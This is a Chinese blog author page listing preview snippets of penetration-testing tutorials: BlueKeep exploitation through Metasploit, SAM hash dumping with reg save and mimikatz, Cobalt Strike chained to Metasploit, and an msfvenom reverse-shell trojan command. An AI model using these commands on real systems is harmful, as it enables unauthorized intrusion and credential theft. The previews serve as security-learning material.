内网安全
~ Venus
这个作者很懒,什么都没留下…
展开
-
记一次实战windows 2008 R2 Datacenter 提权
前景:拿到某个站 getshell 上传马后发现权限低,然后就是漫长的提权过程蚁剑连接到aspx 的马后进入终端先进行信息收集一波,使用命令whoami 可以发现是iis 的权限使用命令 systeminfo 查看操作系统和打了哪些补丁等等,windows 2008 R2 Datacenter只打了一个补丁可以使用蚁剑插件进行一个反弹shell,使用As-Exploits (挺好用的插件)进入后可以先识别一下杀软,运气很好这台服务器没有安装杀软进行反弹shell(首先得在自原创 2022-03-03 08:56:00 · 2010 阅读 · 2 评论 -
cve-2019-0708--(远程桌面服务远程执行代码漏洞)拿下win7权限
准备kali linux 攻击机 ip:192.168.38.128win7 靶机 ip:192.168.38.129kali 进入msfsearch cve-2019-0708选择 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rceuse 1 # 选择1这个模块show targets # 查看适用机型 这里一般设置第一个show options查看需要设置的参数set rhosts 192.168.38.12原创 2022-01-01 16:58:18 · 2861 阅读 · 2 评论 -
读取 Windows Hash 密码两种方式
管理员执行cmdreg save HKLM\SYSTEM C:\sys.hivreg save HKLM\SAM C:\sam.hiv导出注册表文件下载mimikatzhttps://github.com/gentilkiwi/mimikatz/releases配置环境变量我们在c盘目录下,命令行直接执行mimikatz.exelsadump::sam /sam:sam.hiv /system:sys.hiv...原创 2021-12-10 10:27:52 · 1006 阅读 · 0 评论 -
Cobalt Strike(cs) 联动 msf
真实渗透场景靶机:win2008 ip:218.77.102.xvps(cs 服务端 和 安装了msf):centos7 ip:45.76.151.x本地(cs 客户端,连接cs ):本地已经连接cs 并且已经上线、我们只需要连接到msf添加监听器点击add 添加payload 设置为Foreign HTTP,ip 为vps 主机,设置端口 点击seav3. 添加成功后如图4. vps 打开msf,use exploit/multi/handlerset pay原创 2021-11-18 23:49:59 · 3234 阅读 · 0 评论 -
msf渗透命令和后渗透攻击
msf 常用命令1. msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马2. msfconsole 3. use exploit/multi/handler 利用模块4. show targets 查看这原创 2021-11-17 10:19:46 · 2023 阅读 · 0 评论 -
cobaltstrike (cs 使用)初使用
一、CS简介(以下Cobaltstrike简称CS)CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大原创 2021-09-06 23:33:58 · 1050 阅读 · 0 评论